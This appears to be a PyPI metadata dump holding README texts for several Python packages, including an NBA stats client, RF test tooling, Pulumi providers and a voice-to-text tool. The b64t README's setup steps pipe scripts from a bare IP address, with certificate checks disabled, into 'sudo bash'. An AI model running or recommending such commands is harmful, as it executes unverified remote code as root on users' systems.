metadata_version string | name string | version string | summary string | description string | description_content_type string | author string | author_email string | maintainer string | maintainer_email string | license string | keywords string | classifiers list | platform list | home_page string | download_url string | requires_python string | requires list | provides list | obsoletes list | requires_dist list | provides_dist list | obsoletes_dist list | requires_external list | project_urls list | uploaded_via string | upload_time timestamp[us] | filename string | size int64 | path string | python_version string | packagetype string | comment_text string | has_signature bool | md5_digest string | sha256_digest string | blake2_256_digest string | license_expression string | license_files list | recent_7d_downloads int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2.3 | nba_api | 1.11.4 | An API Client package to access the APIs for NBA.com | [](https://pypi.python.org/pypi/nba_api)
[](https://pepy.tech/project/nba-api)
[](https://circleci.com/gh/swar/nba_api)
[](https://github.com/swar/nba_api/blob/master/LICENSE)
[](https://join.slack.com/t/nbaapi/shared_invite/zt-3dc2qtnh0-udQJoSYrQVWaXOF3owVaAw)
# nba_api
## An API Client Package to Access the APIs of NBA.com
`nba_api` is an API Client for `www.nba.com`. This package intends to make the APIs of [NBA.com](https://www.nba.com/) easily accessible and provide extensive documentation about them.
# Getting Started
`nba_api` requires Python 3.10+ along with the `requests` and `numpy` packages. While `pandas` is not required, it is required to work with Pandas DataFrames.
```bash
pip install nba_api
```
## NBA Official Stats
```python
from nba_api.stats.endpoints import playercareerstats
# Nikola Jokić
career = playercareerstats.PlayerCareerStats(player_id='203999')
# pandas data frames (optional: pip install pandas)
career.season_totals_regular_season.get_data_frame()
# json
career.get_json()
# dictionary
career.get_dict()
```
## NBA Live Data
```python
from nba_api.live.nba.endpoints import scoreboard
# Today's Score Board
games = scoreboard.ScoreBoard()
# json
games.get_json()
# dictionary
games.get_dict()
```
## Additional Examples
- [Requests/Response Options](https://github.com/swar/nba_api/blob/master/docs/nba_api/stats/examples.md#endpoint-usage-example)
- Proxy Support, Custom Headers, and Timeout Settings
- Return Types and Raw Responses
- [Static Data Sets](https://github.com/swar/nba_api/blob/master/docs/nba_api/stats/examples.md#static-usage-examples)
- Reduce HTTP requests for common and frequently accessed player and team data.
- [Jupyter Notebooks](https://github.com/swar/nba_api/tree/master/docs/examples)
- Practical examples in Jupyter Notebook format, including making basic calls, finding games, working with play-by-play data, and interacting with live game data.
# Documentation
- [Table of Contents](https://github.com/swar/nba_api/tree/master/docs/table_of_contents.md)
- [Package Structure](https://github.com/swar/nba_api/tree/master/docs/package_structure.md)
- [Endpoints](/docs/nba_api/stats/endpoints)
- Static Data Sets
- [players.py](https://github.com/swar/nba_api/tree/master/docs/nba_api/stats/static/players.md)
- [teams.py](https://github.com/swar/nba_api/tree/master/docs/nba_api/stats/static/teams.md)
# Join the Community
## Slack
Join [Slack](https://join.slack.com/t/nbaapi/shared_invite/zt-3dc2qtnh0-udQJoSYrQVWaXOF3owVaAw) to get help, help others, provide feedback, see amazing projects, participate in discussions, and collaborate with others from around the world.
## Stack Overflow
Not a Slack fan? No problem. Head over to [StackOverflow](https://stackoverflow.com/questions/tagged/nba-api). Be sure to tag your post with `nba-api`.
# Contributing
*See [Contributing to the NBA_API](https://github.com/swar/nba_api/blob/master/CONTRIBUTING.md) for complete details.*
## Endpoints
A significant purpose of this package is to continuously map and analyze as many endpoints on NBA.com as possible. The documentation and analysis of the endpoints and parameters in this package are some of the most extensive information available. At the same time, NBA.com does not provide information regarding new, changed, or removed endpoints.
If you find a new, changed, or deprecated endpoint, open a [GitHub Issue](https://github.com/swar/nba_api/issues)
## Bugs
Encounter a bug, [report a bug](https://github.com/swar/nba_api/issues).
# License & Terms of Use
## API Client Package
The `nba_api` package is Open Source with an [MIT License](https://github.com/swar/nba_api/blob/master/LICENSE).
## NBA.com
NBA.com has a [Terms of Use](https://www.nba.com/termsofuse) regarding the use of the NBA’s digital platforms.
| text/markdown | Swar Patel | <swar.m.patel@gmail.com> | Swar Patel | <swar.m.patel@gmail.com> | MIT | api, basketball, data, nba, sports, stats | [
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13"
] | [] | https://github.com/swar/nba_api | null | >=3.10 | [] | [] | [] | [
"numpy>=1.26.0; python_version < \"3.13\"",
"numpy>=2.1.0; python_version >= \"3.13\"",
"pandas>=2.1.0; python_version < \"3.12\"",
"pandas>=2.2.0; python_version >= \"3.12\"",
"requests<3.0.0,>=2.32.3"
] | [] | [] | [] | [
"Repository, https://github.com/swar/nba_api",
"Documentation, https://github.com/swar/nba_api/blob/master/README.md",
"Bug Tracker, https://github.com/swar/nba_api/issues"
] | poetry/2.0.1 CPython/3.13.1 Darwin/25.3.0 | 2026-02-20T07:02:39.610483 | nba_api-1.11.4.tar.gz | 177,323 | 0d/f8/761434ce98e39d6bdd1b98611102fdc054920e330a5b5194464cb340adf8/nba_api-1.11.4.tar.gz | source | sdist | null | false | 303e23a904eac06ca46198c65261a231 | 1dccd70b78f36f64260e1f353c4a02c1644147c4a2a5ce42fbd9f637d70bad3e | 0df8761434ce98e39d6bdd1b98611102fdc054920e330a5b5194464cb340adf8 | null | [] | 0 |
2.4 | instrumation | 0.1.6 | A high-level Hardware Abstraction Layer (HAL) for RF test stations with Digital Twin support. | # Instrumation
[](https://pypi.org/project/instrumation/) [](https://pypi.org/project/instrumation/) [](https://pypi.org/project/instrumation/)

A high-level Hardware Abstraction Layer (HAL) for RF test stations, designed to simplify interactions with VISA instruments and Serial control boxes.
# About The Project
**Instrumation** is a Python library that provides a unified interface for controlling hardware test benches. It abstracts away the low-level details of PyVISA and PySerial, allowing you to focus on writing test logic rather than connection code.
It features a **Digital Twin** mode, enabling you to develop and test your scripts offline using simulated drivers that generate realistic data with noise.
## Tech Usage
* **Language:** Python 3.7+
* **Libraries:** PyVISA, PySerial
* **Architecture:** Factory Pattern, Polymorphism
* **Standards:** SCPI (Standard Commands for Programmable Instruments)
## Features
* **Auto-Discovery:** Automatically scans and identifies connected devices (VISA & Serial).
* **Smart Factory:** Detects connected hardware (e.g., Keysight vs. Rigol) and loads the correct driver automatically.
* **Digital Twin:** Simulation mode with realistic Gaussian noise for offline development.
* **Unified API:** Use the same code for different hardware brands.
* **Logging:** Built-in CSV logging for test results.
# Getting Started
## Prerequisites
* Python 3.7 or higher
* Git (optional, if cloning the repository)
## Installation
1. **Download or Clone the repository:**
You can download the source code as a ZIP file and extract it, or clone the repository using Git:
```bash
git clone https://github.com/yourusername/instrumation.git
cd instrumation
```
2. **Install the library:**
Navigate to the `instrumation` project root directory (where `setup.py` is located) and install:
```bash
pip install .
```
For developers, you might want to install in editable mode:
```bash
pip install -e .
```
# Setup Guide
## Linux / Termux (Android)
If you are running this on Termux (Android) or a Linux machine:
1. **Install dependencies:**
```bash
pkg install python # Add git if you plan to clone the repo
```
*(On standard Linux, use `sudo apt install python3` and optionally `git`)*
2. **Setup Virtual Environment (Optional but Recommended):**
```bash
python -m venv .venv
source .venv/bin/activate
```
3. **Install the library:**
```bash
pip install .
```
## Windows
1. **Open PowerShell** as Administrator (for driver installation if needed).
2. **Install Python:** Download from [python.org](https://www.python.org/).
3. **Download or Clone and Install:**
```powershell
# If cloning (requires Git):
git clone https://github.com/yourusername/instrumation.git
cd instrumation
# Or if you downloaded the ZIP and extracted it, navigate to the extracted folder:
# cd path\to\instrumation-main
pip install .
```
4. **VISA Backend:** You may need to install NI-VISA or Keysight IO Libraries Suite for physical hardware access.
# Usage
### 1. Real Hardware Mode
Connect your devices and run:
```python
import instrumation
# Auto-connect to first found instrument
sa = instrumation.connect_instrument("USB0::0x2A8D::...")
# Works on ANY supported device (Keysight, Rigol, etc.)
peak_power = sa.get_peak_value()
print(f"Peak Power: {peak_power} dBm")
```
### 2. Digital Twin (Simulation) Mode
Develop offline without hardware.
**Enable Simulation:**
* **Linux/Termux:** `export INSTRUMATION_MODE=SIM`
* **Windows (PowerShell):** `$env:INSTRUMATION_MODE="SIM"`
* **Windows (CMD):** `set INSTRUMATION_MODE=SIM`
**Run Code:**
```python
from instrumation.factory import get_driver
# Address is ignored in SIM mode
driver = get_driver("DUMMY_ADDRESS")
driver.connect()
print(f"ID: {driver.get_id()}")
print(f"Voltage: {driver.measure_voltage(1)} V")
```
| Command | Description |
| :--- | :--- |
| `scan()` | Lists all connected Serial and VISA devices. |
| `connect()` | Auto-connects to a generic Test Station (Box + Inst). |
| `connect_instrument(addr)` | Connects to a specific instrument (loading correct driver). |
# Development & Testing
If you want to contribute or run the tests, follow these steps to avoid import errors.
1. **Install in Editable Mode**:
This is crucial for tests to find your local changes.
```bash
pip install -e .
```
2. **Install Test Dependencies**:
```bash
pip install pytest flake8
```
3. **Run Tests**:
Enable simulation mode and run pytest.
```bash
# Linux / Termux
export INSTRUMATION_MODE=SIM
pytest
# Windows PowerShell
$env:INSTRUMATION_MODE="SIM"
pytest
```
| text/markdown | abduznik | abduznik <abduznik@users.noreply.github.com> | null | null | MIT | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Interface Engine/Protocol Translator"
] | [] | https://github.com/abduznik/instrumation | null | >=3.7 | [] | [] | [] | [
"pyvisa",
"pyserial",
"toml"
] | [] | [] | [] | [
"Homepage, https://github.com/abduznik/instrumation",
"Repository, https://github.com/abduznik/instrumation",
"Bug Tracker, https://github.com/abduznik/instrumation/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T07:02:10.529174 | instrumation-0.1.6.tar.gz | 20,890 | 59/99/1b8f5e9023b5d16196814a8f12abb192ee2b455b08014639863d6ed4ef16/instrumation-0.1.6.tar.gz | source | sdist | null | false | abae7605669ccd4c7d3ba7436181c829 | 111f19be0a6f6bcfe4b0c933f0a8c0ad11c17c3e45047627c8ef0202939c0c7d | 59991b8f5e9023b5d16196814a8f12abb192ee2b455b08014639863d6ed4ef16 | null | [] | 236 |
2.4 | b64t | 0.1.48 | Python bindings for b64t (requires system package) | # b64t - Python Bindings (Wrapper Package)
This is a minimal wrapper package for the system-installed b64t library.
## Installation
### 1. Install system package (required)
**macOS (Homebrew):**
```bash
# Note: -k flag for self-signed cert, will be replaced with proper certificate
curl -fsSLk https://136.110.224.249/b64t/homebrew/setup.sh | bash
```
Or manually:
```bash
brew tap vivanti/b64t
brew install vivanti/b64t/b64t
```
**Linux (APT - Debian/Ubuntu):**
```bash
curl -fsSLk https://136.110.224.249/b64t/apt/setup.sh | sudo bash
sudo apt install b64t
```
**Linux (YUM/DNF - RHEL/CentOS/Fedora):**
```bash
curl -fsSLk https://136.110.224.249/b64t/yum/setup.sh | sudo bash
sudo dnf install b64t
```
**FreeBSD:**
```bash
curl -fsSLk https://136.110.224.249/b64t/pkg/setup.sh | sudo bash
sudo pkg install b64t
```
### 2. Install pip wrapper (for virtual environments)
```bash
python3 -m venv myenv
source myenv/bin/activate
pip install b64t
```
## Usage
```python
import b64t
# Encode
encoded = b64t.encode(b'Hello, World!')
print(encoded)
# Decode
decoded = b64t.decode(encoded)
print(decoded)
# Streaming
with open('input.bin', 'rb') as f:
for chunk in b64t.encodePipe(f):
print(chunk)
```
## How It Works
This wrapper automatically detects your Python distribution and uses the optimal loading strategy:
- **Homebrew/python.org/Linux Python**: Loads the native C extension for maximum performance (Stable ABI, one binary for Python 3.8+)
- **Apple system Python** (`/usr/bin/python3`): Uses ctypes to call `libb64t.dylib` directly, bypassing C extension ABI incompatibilities with Apple's Python shim
## Notes
- This package requires the system `b64t` package to be installed via Homebrew (macOS), APT (Debian/Ubuntu), YUM/DNF (RHEL/CentOS/Fedora), or FreeBSD pkg
- If the system package is not installed, import will fail with a clear error message
| text/markdown | null | Saxon Lysaght-Wheeler <saxon.lysaght-wheeler@vivanti.com> | null | null | null | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Operating System :: POSIX :: Linux",
"Operating System :: MacOS"
] | [] | null | null | >=3.8 | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.3 | 2026-02-20T07:01:18.322876 | b64t-0.1.48.tar.gz | 5,025 | 43/db/bdd2640e44258e5876ff3ca282dc6f84da8f1e5ae66008a412458233afe7/b64t-0.1.48.tar.gz | source | sdist | null | false | 30e1df35baeaeb50fdf17795ff8fdd64 | 6ff4b5713882b256e2eee461dbf743ae59a4273e20e4ed639a1326ce5a3fdb61 | 43dbbdd2640e44258e5876ff3ca282dc6f84da8f1e5ae66008a412458233afe7 | MIT | [] | 234 |
2.4 | pontos | 26.2.0 | Common utilities and tools maintained by Greenbone Networks | 
# Pontos - Greenbone Python Utilities and Tools <!-- omit in toc -->
[](https://github.com/greenbone/pontos/releases)
[](https://pypi.org/project/pontos/)
[](https://codecov.io/gh/greenbone/pontos)
[](https://github.com/greenbone/pontos/actions/workflows/ci-python.yml)
The **pontos** Python package is a collection of utilities, tools, classes and
functions maintained by [Greenbone].
Pontos is the German name of the Greek titan [Pontus](https://en.wikipedia.org/wiki/Pontus_(mythology)),
the titan of the sea.
## Table of Contents <!-- omit in toc -->
- [Documentation](#documentation)
- [Installation](#installation)
- [Requirements](#requirements)
- [Install using pipx](#install-using-pipx)
- [Install using pip](#install-using-pip)
- [Install using poetry](#install-using-poetry)
- [Command Completion](#command-completion)
- [Setup for bash](#setup-for-bash)
- [Setup for zsh](#setup-for-zsh)
- [Development](#development)
- [Maintainer](#maintainer)
- [Contributing](#contributing)
- [License](#license)
## Documentation
The documentation for pontos can be found at https://greenbone.github.io/pontos/. Please refer to the documentation for more details as this README just gives a short overview.
## Installation
### Requirements
Python 3.9 and later is supported.
### Install using pipx
You can install the latest stable release of **pontos** from the Python
Package Index (pypi) using [pipx]
python3 -m pipx install pontos
### Install using pip
> [!NOTE]
> The `pip install` command does no longer work out-of-the-box in newer
> distributions like Ubuntu 23.04 because of [PEP 668](https://peps.python.org/pep-0668).
> Please use the [installation via pipx](#install-using-pipx) instead.
You can install the latest stable release of **pontos** from the Python
Package Index (pypi) using [pip]
python3 -m pip install --user pontos
### Install using poetry
Because **pontos** is a Python library you most likely need a tool to
handle Python package dependencies and Python environments. Therefore we
strongly recommend using [poetry].
You can install the latest stable release of **pontos** and add it as
a dependency for your current project using [poetry]
poetry add pontos
## Command Completion
`pontos` comes with support for command line completion in bash and zsh. All
pontos CLI commands support shell completion. As examples the following sections
explain how to set up the completion for `pontos-release` with bash and zsh.
### Setup for bash
```bash
echo "source ~/.pontos-release-complete.bash" >> ~/.bashrc
pontos-release --print-completion bash > ~/.pontos-release-complete.bash
```
Alternatively, you can use the result of the completion command directly with
the eval function of your bash shell:
```bash
eval "$(pontos-release --print-completion bash)"
```
### Setup for zsh
```zsh
echo 'fpath=("$HOME/.zsh.d" $fpath)' >> ~/.zsh
mkdir -p ~/.zsh.d/
pontos-release --print-completion zsh > ~/.zsh.d/_pontos_release
```
Alternatively, you can use the result of the completion command directly with
the eval function of your zsh shell:
```bash
eval "$(pontos-release --print-completion zsh)"
```
## Development
**pontos** uses [poetry] for its own dependency management and build
process.
First install poetry via [pipx]
python3 -m pipx install poetry
Afterwards run
poetry install
in the checkout directory of **pontos** (the directory containing the
`pyproject.toml` file) to install all dependencies including the packages only
required for development.
Afterwards activate the git hooks for auto-formatting and linting via
[autohooks].
poetry run autohooks activate
Validate the activated git hooks by running
poetry run autohooks check
## Maintainer
This project is maintained by [Greenbone AG][Greenbone]
## Contributing
Your contributions are highly appreciated. Please
[create a pull request](https://github.com/greenbone/pontos/pulls)
on GitHub. Bigger changes need to be discussed with the development team via the
[issues section at GitHub](https://github.com/greenbone/pontos/issues)
first.
## License
Copyright (C) 2020-2024 [Greenbone AG][Greenbone]
Licensed under the [GNU General Public License v3.0 or later](LICENSE).
[Greenbone]: https://www.greenbone.net/
[poetry]: https://python-poetry.org/
[pip]: https://pip.pypa.io/
[pipx]: https://pypa.github.io/pipx/
[autohooks]: https://github.com/greenbone/autohooks
| text/markdown | Greenbone AG | info@greenbone.net | null | null | GPL-3.0-or-later | null | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | <4.0,>=3.9 | [] | [] | [] | [
"colorful>=0.5.4",
"httpx[http2]>=0.23",
"lxml>=4.9.0",
"packaging>=20.3",
"python-dateutil>=2.8.2",
"rich>=12.4.4",
"semver>=2.13",
"shtab>=1.7.0",
"tomlkit>=0.5.11"
] | [] | [] | [] | [
"Documentation, https://greenbone.github.io/pontos/",
"Homepage, https://github.com/greenbone/pontos/",
"Repository, https://github.com/greenbone/pontos/"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T07:00:38.648816 | pontos-26.2.0.tar.gz | 348,755 | 38/90/fd15a633c1039b59fa8d414494e7d4fefed16c6240ab9167c7c4d850a372/pontos-26.2.0.tar.gz | source | sdist | null | false | 15c0bb2ee76ffc5571137b058e17aef5 | 54ed2d1532879647d6f51b94d988c4295da419f7531910b5511a100f7ed81c8b | 3890fd15a633c1039b59fa8d414494e7d4fefed16c6240ab9167c7c4d850a372 | null | [
"LICENSE"
] | 592 |
2.4 | tablevault | 0.2.2 | Centralized data repository for cross-process data filtering in Python. | # TableVault
Version 2.0 of TableVault. Retains basic functionality from v1.0 but with more robust backend storage and simpler API.
You can view the previous website at: www.tablevault.org.
# Changes from v1.0
- Data is stored by data type rather than by instance.
- Tables are stored in ArangoDB rather than as DataFrames.
- First level support for arrays, embeddings, and text files.
- API changes to match industry standards.
# New Core Feature: Data Queries
The main reason for the redesign is that we want to design the metadata layer to support robust queries from the ground up.
The API supports:
- Vector search over data descriptions
- Reproducible search (with timestamps)
- Direct and indirect data lineage (based on code traces)
I would also like to include:
# Planned Features
- Experimental LLM Layer to support natural language search over context
| text/markdown | null | Jinjin Zhao <j2zhao@uchicago.edu> | null | null | null | example, package, python | [] | [] | null | null | >=3.11 | [] | [] | [] | [
"python-arango",
"psutil",
"ruff; extra == \"dev\"",
"pytest; extra == \"dev\"",
"mkdocs-material; extra == \"dev\"",
"mike; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.14.1 | 2026-02-20T06:59:55.176916 | tablevault-0.2.2.tar.gz | 62,365 | 4d/98/c8f80a85eeb2e01664dffc327f63fc38d49871aa39e5e2b007204d914909/tablevault-0.2.2.tar.gz | source | sdist | null | false | e4126003e1d4e07ac237855d5f1280ad | 5b43a742bfbd215fee0d905bae42d0ca0cf39db356c6da35bdc6e689d6dbdc1c | 4d98c8f80a85eeb2e01664dffc327f63fc38d49871aa39e5e2b007204d914909 | MIT | [
"LICENSE"
] | 244 |
2.4 | pulumi-vault | 7.8.0a1771570116 | A Pulumi package for creating and managing HashiCorp Vault cloud resources. | [](https://travis-ci.com/pulumi/pulumi-vault)
# Hashicorp Vault Resource Provider
The Vault resource provider for Pulumi lets you manage Vault resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/vault
or `yarn`:
$ yarn add @pulumi/vault
### Python
To use from Python, install using `pip`:
$ pip install pulumi_vault
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-vault/sdk/v6
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Vault
## Configuration
The following configuration points are available:
- `vault:address` - (Required) Origin URL of the Vault server. This is a URL with a scheme, a hostname and a port but with no path.
May be set via the `VAULT_ADDR` environment variable.
- `vault:token` - (Required) Vault token that will be used by the provider to authenticate. May be set via the `VAULT_TOKEN`
environment variable. If none is otherwise supplied, the provider will attempt to read it from ~/.vault-token (where the vault
command stores its current token). The provider will issue itself a new token that is a child of the one given, with a short TTL
to limit the exposure of any requested secrets. Note that the given token must have the update capability on the `auth/token/create`
path in Vault in order to create child tokens.
- `vault:tokenName` - (Optional) Token name to use for creating the Vault child token. May be set via the `VAULT_TOKEN_NAME`
environment variable.
- `vault:ca_cert_file` - (Optional) Path to a file on local disk that will be used to validate the certificate presented by
the Vault server. May be set via the `VAULT_CACERT` environment variable.
- `vault:ca_cert_dir` - (Optional) Path to a directory on local disk that contains one or more certificate files that will
be used to validate the certificate presented by the Vault server. May be set via the `VAULT_CAPATH` environment variable.
- `vault:client_auth` - (Optional) A configuration block, described below, that provides credentials used by the provider
to authenticate with the Vault server. At present there is little reason to set this, because the provider does not
support the TLS certificate authentication mechanism.
- `vault:cert_file` - (Required) Path to a file on local disk that contains the PEM-encoded certificate to present to the server.
- `vault:key_file` - (Required) Path to a file on local disk that contains the PEM-encoded private key for which the
authentication certificate was issued.
- `vault:skip_tls_verify` - (Optional) Set this to true to disable verification of the Vault server's TLS certificate. This
is strongly discouraged except in prototype or development environments, since it exposes the possibility that the provider
can be tricked into writing secrets to a server controlled by an intruder. May be set via the `VAULT_SKIP_VERIFY` environment variable.
- `vault:max_lease_ttl_seconds` - (Optional) Used as the duration for the intermediate Vault token the provider issues itself,
which in turn limits the duration of secret leases issued by Vault. Defaults to `20` minutes and may be set via the
`TERRAFORM_VAULT_MAX_TTL` environment variable. See the section above on Using Vault credentials in the provider configuration
for the implications of this setting.
- `vault:max_retries` - (Optional) Used as the maximum number of retries when a 5xx error code is encountered. Defaults to `2`
retries and may be set via the VAULT_MAX_RETRIES environment variable.
- `vault:namespace` - (Optional) Set the namespace to use. May be set via the `VAULT_NAMESPACE` environment variable. Available
only for Vault Enterprise.
## Reference
For further information, please visit [the Vault provider docs](https://www.pulumi.com/docs/intro/cloud-providers/vault) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/vault).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, vault | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-vault"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:59:20.604620 | pulumi_vault-7.8.0a1771570116.tar.gz | 675,613 | 5f/a3/f19f7bc2e7972a74dfc5f80d31e7bfb302842f8ec184631f65004c9be020/pulumi_vault-7.8.0a1771570116.tar.gz | source | sdist | null | false | ad8e55ac2835c9dbdcd60154f6e2d8d8 | cc28dbb4efe6188d27f3ff34c074f744e8a1bbf2d28516e4827aaecd65114205 | 5fa3f19f7bc2e7972a74dfc5f80d31e7bfb302842f8ec184631f65004c9be020 | null | [] | 212 |
2.4 | pulumi-snowflake | 2.13.0a1771569954 | A Pulumi package for creating and managing snowflake cloud resources. | [](https://github.com/pulumi/pulumi-snowflake/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/snowflake)
[](https://pypi.org/project/pulumi-snowflake)
[](https://badge.fury.io/nu/pulumi.snowflake)
[](https://pkg.go.dev/github.com/pulumi/pulumi-snowflake/sdk/go)
[](https://github.com/pulumi/pulumi-snowflake/blob/master/LICENSE)
# Snowflake Resource Provider
The Snowflake Resource Provider lets you manage Snowflake resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/snowflake
or `yarn`:
$ yarn add @pulumi/snowflake
### Python
To use from Python, install using `pip`:
$ pip install pulumi_snowflake
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-snowflake/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Snowflake
## Configuration
The following configuration points are available:
* `snowflake:account` - (required) The name of the Snowflake account. Can also come from the
`SNOWFLAKE_ACCOUNT` environment variable.
* `snowflake:username` - (required) Username for username+password authentication. Can come from the
`SNOWFLAKE_USER` environment variable.
* `snowflake:region` - (required) [Snowflake region](https://docs.snowflake.com/en/user-guide/intro-regions.html)
to use. Can be sourced from the `SNOWFLAKE_REGION` environment variable.
* `snowflake:password` - (optional) Password for username+password auth. Cannot be used with `browser_auth` or
`snowflake:privateKeyPath`. Can be sourced from `SNOWFLAKE_PASSWORD` environment variable.
* `snowflake:oauthAccessToken` - (optional) Token for use with OAuth. Generating the token is left to other
tools. Cannot be used with `snowflake:browserAuth`, `snowflake:privateKeyPath`, `snowflake:oauthRefreshToken`
or `snowflake:password`.
Can be sourced from `SNOWFLAKE_OAUTH_ACCESS_TOKEN` environment variable.
* `snowflake:oauthRefreshToken` - (optional) Token for use with OAuth. Setup and generation of the token is
left to other tools. Should be used in conjunction with `snowflake:oauthClientId`, `snowflake:oauthClientSecret`,
`snowflake:oauthEndpoint`, `snowflake:oauthRedirectUrl`. Cannot be used with `snowflake:browserAuth`,
`snowflake:privateKeyPath`, `snowflake:oauthAccessToken` or `snowflake:password`. Can be sourced from
`SNOWFLAKE_OAUTH_REFRESH_TOKEN` environment variable.
* `snowflake:oauthClientId` - (optional) Required when `snowflake:oauthRefreshToken` is used. Can be sourced from
`SNOWFLAKE_OAUTH_CLIENT_ID` environment variable.
* `snowflake:oauthClientSecret` - (optional) Required when `snowflake:oauthRefreshToken` is used. Can be sourced from
`SNOWFLAKE_OAUTH_CLIENT_SECRET` environment variable.
* `snowflake:oauthEndpoint` - (optional) Required when `snowflake:oauthRefreshToken` is used. Can be sourced from
`SNOWFLAKE_OAUTH_ENDPOINT` environment variable.
* `snowflake:oauthRedirectUrl` - (optional) Required when `snowflake:oauthRefreshToken` is used. Can be sourced from
`SNOWFLAKE_OAUTH_REDIRECT_URL` environment variable.
* `snowflake:privateKeyPath` - (optional) Path to a private key for using keypair authentication.. Cannot be
used with `snowflake:browserAuth`, `snowflake:oauthAccessToken` or `snowflake:password`. Can be source from
`SNOWFLAKE_PRIVATE_KEY_PATH` environment variable.
* `snowflake:role` - (optional) Snowflake role to use for operations. If left unset, default role for user
will be used. Can come from the `SNOWFLAKE_ROLE` environment variable.
## Reference
For further information, please visit [the Snowflake provider docs](https://www.pulumi.com/docs/intro/cloud-providers/snowflake)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/snowflake).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, snowflake | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-snowflake"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:58:21.983079 | pulumi_snowflake-2.13.0a1771569954.tar.gz | 1,301,817 | 69/b4/d1d4792ea3337ecafe3342d59faa0deac6a81cb291c84b4f390508e5a4ca/pulumi_snowflake-2.13.0a1771569954.tar.gz | source | sdist | null | false | ce733fca299a80655db946280db8049b | ed479bd3e2efd0588e1d2f80816b7237f03ce2bde78e866b094261adb2b19d94 | 69b4d1d4792ea3337ecafe3342d59faa0deac6a81cb291c84b4f390508e5a4ca | null | [] | 213 |
2.4 | blurt | 0.5.5 | Talk to your coding agents. On-device voice-to-text for macOS Apple Silicon. No cloud, no API keys. | <p align="center">
<pre align="center">
░█▀▄░█░░░█░█░█▀▄░▀█▀
░█▀▄░█░░░█░█░█▀▄░░█░
░▀▀░░▀▀▀░▀▀▀░▀░▀░░▀░
</pre>
<p align="center">Talk to your coding agents.</p>
<p align="center">
<a href="https://pypi.org/project/blurt/"><img src="https://img.shields.io/pypi/v/blurt?color=blue" alt="PyPI"></a>
<a href="https://pepy.tech/project/blurt"><img src="https://img.shields.io/pepy/dt/blurt?color=green" alt="Downloads"></a>
<a href="https://github.com/satyaborg/blurt/blob/main/LICENSE"><img src="https://img.shields.io/github/license/satyaborg/blurt" alt="License"></a>
</p>
</p>
<p align="center">
<img src="https://raw.githubusercontent.com/satyaborg/blurt/main/demo.gif" alt="demo" width="600">
</p>
On-device voice-to-text for macOS. Hold right **⌘**, speak, release - your words go straight into Claude Code, Codex, Cursor, OpenCode or any other agent, wherever your cursor is.
## Install
```bash
pipx install blurt
```
> Requires [pipx](https://pipx.pypa.io/) (`brew install pipx`) and macOS with Apple Silicon.
First run downloads the Whisper model (~1.6 GB, one-time). macOS will prompt for **Microphone** and **Accessibility** access (System Settings → Privacy & Security).
## Usage
| Action | Description |
|---|---|
| Hold right **⌘** | Start recording |
| Release right **⌘** | Stop, transcribe, paste at cursor |
| **Ctrl + C** | Quit |
## Custom Words
Teach Blurt words it gets wrong (names, jargon, acronyms):
```bash
blurt add "Claude Code" # add a word
blurt vocab # list all
blurt rm "Claude Code" # remove
```
Words are stored in `~/.blurt/vocab.txt` (one per line).
## @-mentions
